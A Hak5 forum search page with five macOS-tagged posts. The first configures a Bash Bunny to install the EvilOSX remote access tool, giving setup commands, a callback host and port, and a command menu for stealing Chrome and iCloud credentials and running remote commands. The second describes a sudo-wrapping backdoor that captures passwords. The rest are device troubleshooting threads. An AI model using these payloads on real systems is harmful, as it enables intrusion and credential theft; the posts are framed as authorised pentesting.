Hak5 Forums

Search the Community

Showing results for tags 'macos'.



Found 5 results

  1. [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code: https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX

    untitled_EVILOSX

          ______       _  _   ____    _____ __   __
         |  ____|     (_)| | / __ \  / ____|\ \ / /
         | |__ __   __ _ | || |  | || (___   \ V /
         |  __|\ \ / /| || || |  | | \___ \   > <
         | |____\ V / | || || |__| | ____) | / . \
         |______|\_/  |_||_| \____/ |_____/ /_/ \_\
        untitled_ bash bunny edition / stekole

    ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. **
    ** Accessing a computer system or network without authorization or explicit permission is illegal. **

    Features

    - Client reconnects automatically/persistence
    - ECM_ETHERNET and HID attack
    - Emulate a simple terminal instance.
    - Sockets are encrypted with CSR via OpenSSL.
    - No dependencies (pure python).
    - Retrieve Chrome passwords.
    - Retrieve iCloud contacts.
    - Attempt to get iCloud password via phishing.
    - Show local iOS backups.
    - Download and upload files.
    - Retrieve find my iphone devices.
    - Attempt to get root via local privilege escalation (<= 10.10.5).
    - Auto installer

    Configuration

    Server

    To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server.

        git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX
        ./Server

    and type your listening port (1337)

    Client

    Before you deploy your bash bunny, update your configuration in the EvilOSX.py file. At the bottom of the file you will see a server and port variable. Set these to your server IP and listening port.

        #########################
        SERVER_HOST = "10.99.99.16"
        SERVER_PORT = 1337
        #########################

    Usage

    Plug in your bash bunny and wait until the script has finished running.
    You should see the client connect to the server.

        [email protected]:~/git/EvilOSX# ./Server.py
          ______       _  _   ____    _____ __   __
         |  ____|     (_)| | / __ \  / ____|\ \ / /
         | |__ __   __ _ | || |  | || (___   \ V /
         |  __|\ \ / /| || || |  | | \___ \   > <
         | |____\ V / | || || |__| | ____) | / . \
         |______|\_/  |_||_| \____/ |_____/ /_/ \_\
        [?] Port to listen on: 1337
        [I] Type "help" to get a list of available commands.
        > help
        help          - Show this help menu.
        status        - Show debug information.
        clients       - Show a list of clients.
        connect <ID>  - Connect to the client.
        exit          - Close the server and exit.
        > clients
        [I] 1 client(s) available:
        0 = client_hostname
        > connect 0
        [I] Connected to "client_hostname", ready to send commands.

    Some of the other features can be found in the help menu. I have not tried them all.

        help             - Show this help menu.
        status           - Show debug information.
        clients          - Show a list of clients.
        connect <ID>     - Connect to the client.
        get_info         - Show basic information about the client.
        get_root         - Attempt to get root via local privilege escalation.
        download <path>  - Downloads the file to the local machine.
        upload <path>    - Uploads the file to the remote machine.
        chrome_passwords - Retrieve Chrome passwords.
        icloud_contacts  - Retrieve iCloud contacts.
        icloud_phish     - Attempt to get iCloud password via phishing.
        itunes_backups   - Show the user's local iOS backups.
        find_my_iphone   - Retrieve find my iphone devices.
        screenshot       - Takes a screenshot of the client.
        kill_client      - Brutally kill the client (removes the server).
        exit             - Exits the session.
        Any other command will be executed on the connected client.

    Removal of Tool

    The python script gets added to the user's ~/Library/ directory - and a startup file is added to the ~/Library/LaunchAgents directory.

        rm -rf ~/Library/Containers/.EvilOSX/
        launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist

    Defence

    Disable the command-space short key for spotlight or disable spotlight altogether if not needed.

    Todo

    Issues

    I ran into a few issues with the "Build" of the python script. If the default one in this payload doesn't work, regenerate a new EvilOSX.py. Run ./BUILDER and enter the appropriate information. After, copy this to your switch payload.

    Thanks @Marten4n6 [YOURMOM](Check my room)
  2. [PAYLOAD]SudoBackdoor

    Ding ding, it's payload time. This is a two-stage payload. First you use the 'injector' that will install a small bash script which is a wrapper for sudo. The script will store the passwords. Second, you use the 'cleaner' to get the passwords back and clean the backdoor. So basically, you get access to a computer running MacOS or Linux (you can config the payload by setting mac=true) and you install the backdoor. A couple of hours/days/weeks later you come back, grab the passwords and erase traces. Easy.

    Link: https://github.com/oXis/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor

    I'll submit a pull request but first I need people to test this on MacOS and Linux. It works on my Linux Mint. Ninja!
  3. Initial setup problems

    I'm having some problems getting started with the Bash Bunny and after watching some YT videos, reading the Wiki and forums, I figured I'd start a new thread to see if some of you could set me straight. I'm using macOS 10.12.5. Specifically, I am having no luck getting the Bunny to share my network connection. Here's what I've done so far:

    - I can serial into the Bunny by using the Serial app on macOS. Works just fine. I ran ifconfig while connected via serial and only see the local adapter. I can configure eth0 but the Bunny forgets it after it's removed.
    - The Bunny will show up in Serial as something that I can connect to. It also shows up in Finder. It does not show up under System Preferences --> Sharing so I cannot enable sharing there. There was a great forum post on this but I just couldn't get it to work.
    - I've booted the Bunny on setting one with a payload file (payload.txt) that only includes the following line: ATTACKMODE ECM_ETHERNET. I did not use #!/bin/bash or a specific LED pattern, just that one line. This seems to do nothing. I also tried "ATTACKMODE RNDIS_ETHERNET STORAGE" (no quotes) but this didn't do anything either.
    - I installed and ran Squid as specified in the Wiki. I can seemingly run Squid but ssh to 172.16.64.1 results in a time out on port tcp/22.
    - Since nothing has worked, I've also tried using bb.sh to try and set up the Bunny this way. When I do that, I am allowed to get to the confirmation of network info (basically do you want guided or manual and do you have iproute installed) but then the gateway and IP are set to blanks. When I set them, the script times out on step three (error on line 183) telling me to connect the Bunny to my computer.

    So I feel like I've tried a lot of things here and I'm not even getting close. Any advice anyone has for me is sincerely appreciated. I feel like this shouldn't be this hard! Thank you!
  4. ICS on macOS: There and back again

    Apple likes to hard code the subnet (192.168.2.1) that is used on its implementation of Internet Connection Sharing (ICS). I don't know why; best I can figure is that somehow allows them to more reliably prevent the client network from accessing any resources on the host network. This is something that can be prevented on other ICS setups with a firewall rule. Which brings me to another point. Apple likes to change firewalls. Apple likes to change everything. They recently switched to PF and a lot of the guides online are from before this change. So we've established something here. Apple changes things. And we can't stop them from changing things. So what do we do?

    Accounting for Change

    One thing has remained consistent in their various iterations of ICS. They use the subnet 192.186.2.0/24. This gives us 1 constant, and if we've learned our lesson, we also know that it may not stay constant. So let me back up. *ahem* We have zero constants. But we can plan for this one constant changing. Apple needs this base principle (a subnet) on which to build its ICS implementation. Think of a single stream in the woods that recursively branches out into thousands. In order to catalog the various species in the stream, it would not be wise to visit and collect samples from every stream. This would be inefficient. It would better serve you, your time and your study to head to the one stream whence all others came. The source. This subnet is the one stream and any changes Apple makes will use it. And even if it changes it, it's still only one change we have to account for. Knowing this, we can start to look at this problem from another perspective. We can stop visiting individual streams and concede that our network must be in the 192.168.2.1/24 range.

    What does that mean for Pineapple users?

    It means you can't access the Pineapple on 172.16.42.1 anymore. Is this a bad thing? Meh. It's a thing. For sure. I'd posit it's even a good thing. If we leave our pineapples on the default network, we eliminate the guesswork needed for anyone hunting pineapple. Yes, those people exist. And the tools necessary to do so bank on the fact that you haven't changed your default settings. See here.

    Is there a simple solution?

    Just move the pineapple to a different network! How? Depending on the version of the Pineapple, you can use WiFi or Ethernet or Ethernet-over-USB to make the initial connection to the Pineapple over SSH on 172.16.42.1. Once you're in:

        # This one could be anything you want. It's what you'll use to connect after the reboot
        uci set network.lan.ipaddr='192.168.2.10'
        # This is where the Pineapple will get its Internet from.
        uci set network.lan.gateway='192.168.2.1'
        uci commit && reboot

    That's it. Once you've rebooted, you can access the web interface and SSH like you would at 172.16.42.1, but if you used my configuration settings from above, you can access it from 192.168.2.10.

    What if Apple changes the subnet?

    Then you only have two values to change. Be sure to actually turn on ICS from the Mac's System Preferences > Sharing Pane.
  5. Bunny not recognised & buggy

    Hi, I just received my Bash Bunny a few days ago and I've been tinkering around with it. It seems, to me, to be quite buggy:

    - Windows does not recognise the RNDIS interface at all. Not on Windows 7, not on Windows 10.
    - On MacOS, the ethernet interface *sometimes* works, sometimes it doesn't. When it does work, *sometimes* it is possible to connect to the Bunny using, quite often, SSH doesn't start up even though FTP and other services are running. This even after a few minutes waiting.
    - The serial interface often conflicts with having network & storage together, resulting in nothing happening or giving only access to storage. (I did this by adding "SERIAL" to the standard payloads already on the Bunny)
    - Using the manuals found online for network sharing (MacOS Internet sharing through 172.16.64.64), I cannot access the internet from the Bunny, so I cannot update it. On Windows, that's entirely out of the question as Windows does not even recognise the RNDIS network device.

    Windows gives the following message on the RNDIS driver:

        The drivers for this device are not installed. (Code 28)
        There are no compatible drivers for this device.
        To find a driver for this device, click Update Driver.